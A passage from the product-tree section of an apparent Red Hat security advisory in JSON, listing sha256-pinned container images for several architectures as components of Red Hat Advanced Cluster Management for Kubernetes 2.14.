"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
